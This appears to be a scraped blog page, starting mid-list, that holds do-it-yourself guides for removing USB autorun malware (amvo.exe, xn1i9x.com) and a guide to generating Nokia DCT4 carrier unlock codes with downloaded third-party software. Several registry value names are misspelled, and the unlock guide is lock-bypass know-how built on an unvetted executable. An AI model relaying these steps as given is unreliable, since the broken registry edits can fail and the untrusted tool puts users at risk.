Windows\CurrentVersion\Explorer\Advanced\Folder\Hidden\NOHIDDEN DefaultValue 1
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\
Windows\CurrentVersion\Explorer\Advanced\Folder\Hidden\SHOWALL CheckedValue 1
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\
Windows\CurrentVersion\Explorer\Advanced\Folder\Hidden\SHOWALL DefaultValue 1
HKEY_CURRENT_USER\Software\Microsoft\
Windows\CurrentVersion\Policies\Explorer NoDriveTypeAutoRun 0x00000091 (145)
-- OR --
Reboot into a different OS and do the following
Step 3
From all the drives delete the autorun.inf using command line (if on windows) or from a linux OS. Do not open the drive from the explorer as it would spread the virus again to this OS. If you have linux installed and can access all partitions on the disk, go delete the files and clear the trash on all drives.
Step 4
Reboot the system.
Do necessary changes as in Step 2, if you have not done those.
I hope that will do it
Install a good antivirus update it.
Prevent Autorun from USBs.
To disable Autoplay of all drives
Start > Run > gpedit.msc
Enable : Computer Configuration > Administrative Templates > System > Turn Off Autoplay
symptoms
* Cannot show hidden files
* Slows down USB devices
* Adds infections to plugged in USB devices
* Drives open in new windows from My Computer
How to get rid off?
Step 1
The usual way is to Format the system, but it is not a permanent solution. To get rid run regedit, find all keys related to amvo.exe or the name of the virus.
Run msconfig in the Start Up Tab you can find the amvo.exe or its variants.
Remove all occurrence of the name from regedit.
Reboot the System.
Step 2
Reboot and do the following changes to the Registry using regedit
HKEY_CURRENT_USER\Software\Microsoft\
Windows\CurrentVersion\Explorer searchidden en 1
HKEY_CURRENT_USER\Software\Microsoft\
Windows\CurrentVersion\Explorer searchsystemdirs en 1
HKEY_CURRENT_USER\Software\Microsoft\
Windows\CurrentVersion\Explorer\Advanced hidden en 1
HKEY_CURRENT_USER\Software\Microsoft\
Windows\CurrentVersion\Explorer\Advanced showsuperhiden en 1
HKEY_CURRENT_USER\Software\Microsoft\
Windows\CurrentVersion\Explorer\Advanced superhiden en 1
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\
Windows\CurrentVersion\Explorer\Advanced\Folder\Hidden\NOHIDDEN CheckedValue 1
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\
Windows\CurrentVersion\Explorer\Advanced\Folder\Hidden\NOHIDDEN DefaultValue 1
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\
Windows\CurrentVersion\Explorer\Advanced\Folder\Hidden\SHOWALL CheckedValue 1
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\
Windows\CurrentVersion\Explorer\Advanced\Folder\Hidden\SHOWALL DefaultValue 1
HKEY_CURRENT_USER\Software\Microsoft\
Windows\CurrentVersion\Policies\Explorer NoDriveTypeAutoRun 0x00000091 (145)
-- OR --
Reboot into a different OS and do the following
Step 3
From all the drives delete the autorun.inf using command line (if on windows) or from a linux OS. Do not open the drive from the explorer as it would spread the virus again to this OS. If you have linux installed and can access all partitions on the disk, go delete the files and clear the trash on all drives.
Step 4
Reboot the system.
Do necessary changes as in Step 2, if you have not done those.
I hope that will do it
Install a good antivirus update it.
Prevent Autorun from USBs.
To disable Autoplay of all drives
Start > Run > gpedit.msc
Enable : Computer Configuration > Administrative Templates > System > Turn Off Autoplay
clean the virux xn1i9x.com
This is a spyware where creates files of the name like h.cmd, xn1i9x.com, ylr.exe, awda2.exe etc and creates an associated autorun.inf file which executes these files. Simply deleting these files along with autorun.inf wont work as they are recreated after some time. This happens because it has created an entry in the startup folder. You need to remove it and once that is done just delete all the malicious files present on each of your drive. They wont be recreated after that.
The startup entry can be present in the various possible location.
click here to get detailed description of these places
The startup entry can be present in the various possible location.
click here to get detailed description of these places
Unlock your nokia cell phones for free
Unlock your nokia cell phones for free, without any cables Now Anyone can now calculate their own DCT4 Nokia unlock codes, and Unlock their Nokia Cell phones. Why? If you unlock your phone then you can go to a different provider with the same phone. This is usually something for the people with tri-band phones. Some take it out of the country and use the phone with the local sim card provider. You can now buy phones off ebay, and won't have to pay someone $$ to unlock it for you. {mos_sb_discuss: 18} It has been released for free!! Anyone can now calculate their own DCT4 Nokia unlock codes. Download CyberGSM and Hollowmans software HERE! (this is their latest release 1.4). Cyber's software seems to work on all Windows operating systems including XP! Also it is the most stable and user friendly! To calculate the correct unlock code you will need to enter into the software three pieces of information about your locked phone: 1) Lock type: This is either 2 or 5. Always select 2 unless your handset is a 7650, 3650, 3660 N-gage, 6600 in which case select 5. 2) IMEI The 15 digit serial number of your handset. This can be found by pressing *#06# into your handset. 3) Network provider This refers to the network your handset is locked too. For UK providers Orange = 23433 T-Mobile = 23430 Vodafone = 23415 O2 = 23410 Virgin = 23400 (although can vary from handset to handset) The latest version of Cybers software makes selecting the correct network code very easy indeed! Just select the network your handset is locked to using the drop down listboxes. You can view a page containing a complete world wide list for all network provider codes HERE. (thanks to Yeldar) Ready? Step 1 Unzip cyber & hollowmans software and double click the file named: DCT4 Calculator 1.4.exe Step 2 Complete the IMEI field, and then select the country and network your handset is locked too using the drop down list boxes. Now you need to select a lock type: either 2 or 5. Always leave this as type 2 UNLESS the phone you want to unlock is a 7650 or 3650 in which case select type 5. You will also See a check box - make sure this REMAINS checked (as this means the software will calculate the latest version 2 codes not the older less reliable version 1 codes) See the screen shot below! The program will produce a set of 7 codes, something like those below: #pw+378826702640327 +1# #pw+294365624205166 +2# #pw+843021176162422 +3# #pw+444037775262334 +4# #pw+494237425204736 +5# #pw+733110464133112 +6# #pw+145234270304737 +7# Any one of the 7 codes codes will probably unlock your phone but I normally use Code 7 first, if that does not work then code 1 and on the rare occasion they both fail I try code 5. Step 3 Now enter code 7 into your phone with NO sim card in! To access "p" just press "*" three times within one second. To access "w" press "*" four times within one second. To access button "+" you have to press twice "*" within less than a second. If successful you will see the message 'Phone restriction off' (if not you will get a 'code error' message). THAT'S IT, YOUR PHONE IS UNLOCKED! ITS THAT SIMPLE!! IF YOU HAVE 3 FAILED ATTEMPTS AT ENTERING IN THE CODE (I.E YOU SEE "CODE ERROR" 3 TIMES) THEN STOP AND PLACE YOUR DETAILS ON MY FORUM. Warning and Tips!!! If the unlock code has been entered incorrectly 5 times or more then upon entering in further codes the phone will display "cannot undo restriction" (or "Not Allowed" for Symbian phones - 7650 / 3650 / N-Gage) message instead of "code error". If you see the "cannot undo restriction" or "Not Allowed" message then only a proffesional unlocker can help you by using an expensive cable soloution! If the code does not work after a couple of tries: 1) Double check you have entered the correct IMEI - press *#06# into the handset to display your IMEI. (many people type a digit in wrong) 2) Double check what network the handset is locked too and your network code. 3) Make sure your phone is not already unlocked! sounds daft but some people just don't know what they are doing! To check if your phone is locked, insert a foreign sim into the handset. (i.e. a sim that the handset will not accept) - the phone should display something like 'enter restriction code' - if you do not see this then your phone is not locked! If Your phone is already unlocked you will always get code error regardless if you enter the correct code or not!!! As mentioned earlier, to prevent dissapointment please post your details on my forum if you have 3 failed attempts. NB. Do not worry, you CAN NOT damage your phone by entering the incorrect code more than 5 times! Its just that you will not be able to unlock it even with a correct code if you have! So unlocking by codes is very safe! :-)
Subscribe to:
Posts (Atom)
